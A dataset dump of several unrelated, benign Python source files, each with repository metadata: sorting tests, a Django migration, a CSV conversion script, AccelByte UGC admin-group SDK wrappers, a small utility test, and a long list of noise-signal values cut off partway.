jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
import pytest
from selection import selection_smallest_first, selection_largest_first
def test_selection_smallest_random():
"""Test randomly ordered list."""
lst = [54,26,93,17,77,31,44,55,20]
assert selection_smallest_first(lst) == [17, 20, 26, 31, 44, 54, 55, 77, 93]
def test_selection_smallest_nearly_ordered():
"""Test nearly ordered list."""
lst = [1, 2, 3, 4, 6, 7, 8, 9, 5]
assert selection_smallest_first(lst) == [1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_selection_smallest_reverse_ordered():
"""Test reverse ordered list."""
lst = [9, 8, 7, 6, 5, 4, 3, 2, 1]
assert selection_smallest_first(lst) == [1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_selection_smallest_two_values():
"""Test list with two repeated values."""
lst = [8, 3, 8, 3, 8, 3, 8, 8, 3, 3]
assert selection_smallest_first(lst) == [3, 3, 3, 3, 3, 8, 8, 8, 8, 8]
def test_selection_largest_random():
"""Test randomly ordered list."""
lst = [54,26,93,17,77,31,44,55,20]
assert selection_largest_first(lst) == [17, 20, 26, 31, 44, 54, 55, 77, 93]
def test_selection_largest_nearly_ordered():
"""Test nearly ordered list."""
lst = [1, 2, 3, 4, 6, 7, 8, 9, 5]
assert selection_largest_first(lst) == [1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_selection_largest_reverse_ordered():
"""Test reverse ordered list."""
lst = [9, 8, 7, 6, 5, 4, 3, 2, 1]
assert selection_largest_first(lst) == [1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_selection_largest_two_values():
"""Test list with two repeated values."""
lst = [8, 3, 8, 3, 8, 3, 8, 8, 3, 3]
assert selection_largest_first(lst) == [3, 3, 3, 3, 3, 8, 8, 8, 8, 8]
| 32.057692
| 80
| 0.622675
| 289
| 1,667
| 3.418685
| 0.134948
| 0.020243
| 0.129555
| 0.036437
| 0.862348
| 0.831984
| 0.831984
| 0.831984
| 0.831984
| 0.831984
| 0
| 0.139078
| 0.206359
| 1,667
| 51
| 81
| 32.686275
| 0.60771
| 0.139772
| 0
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 1
| 0.307692
| false
| 0
| 0.076923
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a785a92c11a1942b369d747626f832cdbc0d4e03
| 4,269
|
py
|
Python
|
hlwtadmin/migrations/0026_auto_20200415_1628.py
|
Kunstenpunt/havelovewilltravel
|
6a27824b4d3d8b1bf19e0bc0d0648f0f4e8abc83
|
[
"Apache-2.0"
] | 1
|
2020-10-16T16:29:01.000Z
|
2020-10-16T16:29:01.000Z
|
hlwtadmin/migrations/0026_auto_20200415_1628.py
|
Kunstenpunt/havelovewilltravel
|
6a27824b4d3d8b1bf19e0bc0d0648f0f4e8abc83
|
[
"Apache-2.0"
] | 365
|
2020-02-03T12:46:53.000Z
|
2022-02-27T17:20:46.000Z
|
hlwtadmin/migrations/0026_auto_20200415_1628.py
|
Kunstenpunt/havelovewilltravel
|
6a27824b4d3d8b1bf19e0bc0d0648f0f4e8abc83
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.0 on 2020-04-15 14:28
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('hlwtadmin', '0025_auto_20200414_1705'),
]
operations = [
migrations.AlterModelOptions(
name='gigfinderurl',
options={'ordering': ['-last_confirmed_by_musicbrainz', '-last_synchronized']},
),
migrations.AddField(
model_name='historicalorganisation',
name='end_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='historicalorganisation',
name='start_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='historicalrelationartistartist',
name='end_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='historicalrelationartistartist',
name='start_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='historicalrelationorganisationorganisation',
name='end_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='historicalrelationorganisationorganisation',
name='start_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='organisation',
name='end_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='organisation',
name='start_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='relationartistartist',
name='end_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='relationartistartist',
name='start_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='relationorganisationorganisation',
name='end_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AddField(
model_name='relationorganisationorganisation',
name='start_date_precision',
field=models.PositiveSmallIntegerField(choices=[(2, 'Precise up to the year'), (5, 'Precise up to the month'), (8, 'Precise up to the day')], default=2),
),
migrations.AlterField(
model_name='gigfinderurl',
name='last_synchronized',
field=models.DateTimeField(default=datetime.datetime(1970, 1, 1, 0, 0, tzinfo=utc)),
),
]
| 50.223529
| 165
| 0.621926
| 465
| 4,269
| 5.612903
| 0.148387
| 0.124138
| 0.151724
| 0.193103
| 0.842146
| 0.842146
| 0.814943
| 0.814943
| 0.814943
| 0.814943
| 0
| 0.026867
| 0.250176
| 4,269
| 84
| 166
| 50.821429
| 0.788504
| 0.010073
| 0
| 0.794872
| 1
| 0
| 0.346828
| 0.072206
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a79c38b565483682aa7ad9b82c4dfb210e2d6918
| 372
|
py
|
Python
|
Uber Ludwig Examples/French-English Bilingual Pairs/txt_to_csv.py
|
AymaneZizi/Tutorials
|
e67f8d1eba0e4aa4ebb095966a215b48b1efe64a
|
[
"MIT"
] | 559
|
2019-02-21T08:14:34.000Z
|
2022-03-30T21:47:27.000Z
|
Uber Ludwig Examples/French-English Bilingual Pairs/txt_to_csv.py
|
mehdi2019gaied/Tutorials
|
aa4a1735ba9d7f54e1eabdb2780bfcaf031ba90a
|
[
"MIT"
] | 46
|
2019-03-02T18:42:20.000Z
|
2022-03-17T01:34:07.000Z
|
Uber Ludwig Examples/French-English Bilingual Pairs/txt_to_csv.py
|
mehdi2019gaied/Tutorials
|
aa4a1735ba9d7f54e1eabdb2780bfcaf031ba90a
|
[
"MIT"
] | 726
|
2019-02-18T15:52:40.000Z
|
2022-03-27T22:37:54.000Z
|
import os
import pandas as pd
if __name__ == '__main__':
df = pd.read_csv('/media/gilbert/948A92E98A92C760/Local_Programming/Datasets/Other/French-English Bilingual Pairs/fra.txt', sep='\t', header=None, names=['english', 'french'])
df.head()
df.to_csv('/media/gilbert/948A92E98A92C760/Local_Programming/Datasets/Other/French-English Bilingual Pairs/fra.csv')
| 53.142857
| 179
| 0.758065
| 51
| 372
| 5.294118
| 0.607843
| 0.059259
| 0.111111
| 0.22963
| 0.666667
| 0.666667
| 0.666667
| 0.666667
| 0.666667
| 0.666667
| 0
| 0.071217
| 0.094086
| 372
| 7
| 180
| 53.142857
| 0.72997
| 0
| 0
| 0
| 0
| 0.333333
| 0.613941
| 0.423592
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
a7b5abc58573e6dfee77ee4b484a0ff19f1e0d5b
| 14,285
|
py
|
Python
|
accelbyte_py_sdk/api/ugc/wrappers/_admin_group.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/ugc/wrappers/_admin_group.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/ugc/wrappers/_admin_group.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import HeaderStr
from ....core import get_namespace as get_services_namespace
from ....core import run_request
from ....core import run_request_async
from ....core import same_doc_as
from ..models import ModelsCreateGroupRequest
from ..models import ModelsCreateGroupResponse
from ..models import ModelsPaginatedContentDownloadResponse
from ..models import ModelsPaginatedGroupResponse
from ..models import ResponseError
from ..operations.admin_group import AdminCreateGroup
from ..operations.admin_group import AdminDeleteGroup
from ..operations.admin_group import AdminGetAllGroups
from ..operations.admin_group import AdminGetGroup
from ..operations.admin_group import AdminGetGroupContents
from ..operations.admin_group import AdminUpdateGroup
from ..operations.admin_group import SingleAdminDeleteGroup
from ..operations.admin_group import SingleAdminGetAllGroups
from ..operations.admin_group import SingleAdminGetGroup
from ..operations.admin_group import SingleAdminGetGroupContents
from ..operations.admin_group import SingleAdminUpdateGroup
@same_doc_as(AdminCreateGroup)
def admin_create_group(body: ModelsCreateGroupRequest, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminCreateGroup.create(
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminCreateGroup)
async def admin_create_group_async(body: ModelsCreateGroupRequest, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminCreateGroup.create(
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminDeleteGroup)
def admin_delete_group(group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminDeleteGroup.create(
group_id=group_id,
user_id=user_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminDeleteGroup)
async def admin_delete_group_async(group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminDeleteGroup.create(
group_id=group_id,
user_id=user_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetAllGroups)
def admin_get_all_groups(user_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminGetAllGroups.create(
user_id=user_id,
limit=limit,
offset=offset,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetAllGroups)
async def admin_get_all_groups_async(user_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminGetAllGroups.create(
user_id=user_id,
limit=limit,
offset=offset,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetGroup)
def admin_get_group(group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminGetGroup.create(
group_id=group_id,
user_id=user_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetGroup)
async def admin_get_group_async(group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminGetGroup.create(
group_id=group_id,
user_id=user_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetGroupContents)
def admin_get_group_contents(group_id: str, user_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminGetGroupContents.create(
group_id=group_id,
user_id=user_id,
limit=limit,
offset=offset,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetGroupContents)
async def admin_get_group_contents_async(group_id: str, user_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminGetGroupContents.create(
group_id=group_id,
user_id=user_id,
limit=limit,
offset=offset,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminUpdateGroup)
def admin_update_group(body: ModelsCreateGroupRequest, group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminUpdateGroup.create(
body=body,
group_id=group_id,
user_id=user_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminUpdateGroup)
async def admin_update_group_async(body: ModelsCreateGroupRequest, group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = AdminUpdateGroup.create(
body=body,
group_id=group_id,
user_id=user_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminDeleteGroup)
def single_admin_delete_group(group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminDeleteGroup.create(
group_id=group_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminDeleteGroup)
async def single_admin_delete_group_async(group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminDeleteGroup.create(
group_id=group_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetAllGroups)
def single_admin_get_all_groups(limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminGetAllGroups.create(
limit=limit,
offset=offset,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetAllGroups)
async def single_admin_get_all_groups_async(limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminGetAllGroups.create(
limit=limit,
offset=offset,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetGroup)
def single_admin_get_group(group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminGetGroup.create(
group_id=group_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetGroup)
async def single_admin_get_group_async(group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminGetGroup.create(
group_id=group_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetGroupContents)
def single_admin_get_group_contents(group_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminGetGroupContents.create(
group_id=group_id,
limit=limit,
offset=offset,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetGroupContents)
async def single_admin_get_group_contents_async(group_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminGetGroupContents.create(
group_id=group_id,
limit=limit,
offset=offset,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminUpdateGroup)
def single_admin_update_group(body: ModelsCreateGroupRequest, group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminUpdateGroup.create(
body=body,
group_id=group_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminUpdateGroup)
async def single_admin_update_group_async(body: ModelsCreateGroupRequest, group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = SingleAdminUpdateGroup.create(
body=body,
group_id=group_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
| 39.570637
| 227
| 0.720126
| 1,697
| 14,285
| 5.82145
| 0.068945
| 0.113574
| 0.08017
| 0.053447
| 0.875493
| 0.825185
| 0.812329
| 0.804231
| 0.786213
| 0.781962
| 0
| 0.000345
| 0.189009
| 14,285
| 360
| 228
| 39.680556
| 0.852395
| 0.053623
| 0
| 0.772414
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037931
| false
| 0
| 0.075862
| 0
| 0.265517
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
38fad5109a004000fd2e1b7345df5be96fc74605
| 238
|
py
|
Python
|
tests/test_util/test_filter_none_kwargs.py
|
u8sand/FAIRshake
|
8f6f3dde42de29b88e9a43bdd43f848382e3bad7
|
[
"Apache-2.0"
] | null | null | null |
tests/test_util/test_filter_none_kwargs.py
|
u8sand/FAIRshake
|
8f6f3dde42de29b88e9a43bdd43f848382e3bad7
|
[
"Apache-2.0"
] | 8
|
2018-06-05T17:01:43.000Z
|
2018-06-22T01:19:39.000Z
|
tests/test_util/test_filter_none_kwargs.py
|
u8sand/FAIRshake
|
8f6f3dde42de29b88e9a43bdd43f848382e3bad7
|
[
"Apache-2.0"
] | 1
|
2018-06-06T17:22:28.000Z
|
2018-06-06T17:22:28.000Z
|
from app.util.filter_none_kwargs import filter_none_kwargs
def test_filter_none_kwargs():
assert filter_none_kwargs(a=None, b='c') == {'b': 'c'}
assert filter_none_kwargs({'a': None, 'b': 'c'}, d=None, e='c') == {'b': 'c', 'e': 'c'}
| 39.666667
| 89
| 0.647059
| 41
| 238
| 3.487805
| 0.365854
| 0.34965
| 0.559441
| 0.307692
| 0.405594
| 0.405594
| 0.405594
| 0.405594
| 0
| 0
| 0
| 0
| 0.121849
| 238
| 5
| 90
| 47.6
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 0.046218
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac081d8bde20d4cb75c26ebdda39414ba815a92d
| 20,779
|
py
|
Python
|
test_signals.py
|
vladimirnesterov/ten-little-algorithms
|
8df2e90c43e29a69171a3f6e1bf75ad4cd0759b3
|
[
"MIT"
] | null | null | null |
test_signals.py
|
vladimirnesterov/ten-little-algorithms
|
8df2e90c43e29a69171a3f6e1bf75ad4cd0759b3
|
[
"MIT"
] | null | null | null |
test_signals.py
|
vladimirnesterov/ten-little-algorithms
|
8df2e90c43e29a69171a3f6e1bf75ad4cd0759b3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed May 19 11:47:55 2021
@author: Vladimir
"""
noise_signal = [2.7696641934421677, 4.769664193442168, 3.7696641934421677, 3.7696641934421677, 5.769664193442168, 6.769664193442168, 3.7696641934421677, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -5.230335806557832, -5.230335806557832, -6.230335806557832, -6.230335806557832, -6.230335806557832, -4.230335806557832, -2.2303358065578323, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 4.769664193442168, 3.7696641934421677, 1.7696641934421677, 1.7696641934421677, 2.7696641934421677, 3.7696641934421677, 3.7696641934421677, 3.7696641934421677, 4.769664193442168, 5.769664193442168, 7.769664193442168, 4.769664193442168, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -0.23033580655783226, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -4.230335806557832, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, -3.2303358065578323, -6.230335806557832, -4.230335806557832, -3.2303358065578323, -0.23033580655783226, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -0.23033580655783226, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -0.23033580655783226, 2.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 2.7696641934421677, 2.7696641934421677, 2.7696641934421677, 1.7696641934421677, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, -1.2303358065578323, 0.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 1.7696641934421677, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -4.230335806557832, -4.230335806557832, -4.230335806557832, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 2.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 3.7696641934421677, 4.769664193442168, 4.769664193442168, 2.7696641934421677, 2.7696641934421677, 5.769664193442168, 4.769664193442168, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, 1.7696641934421677, 3.7696641934421677, 1.7696641934421677, -2.2303358065578323, -3.2303358065578323, -4.230335806557832, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 1.7696641934421677, 3.7696641934421677, 4.769664193442168, 3.7696641934421677, 2.7696641934421677, 2.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -4.230335806557832, -4.230335806557832, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -1.2303358065578323, 1.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, 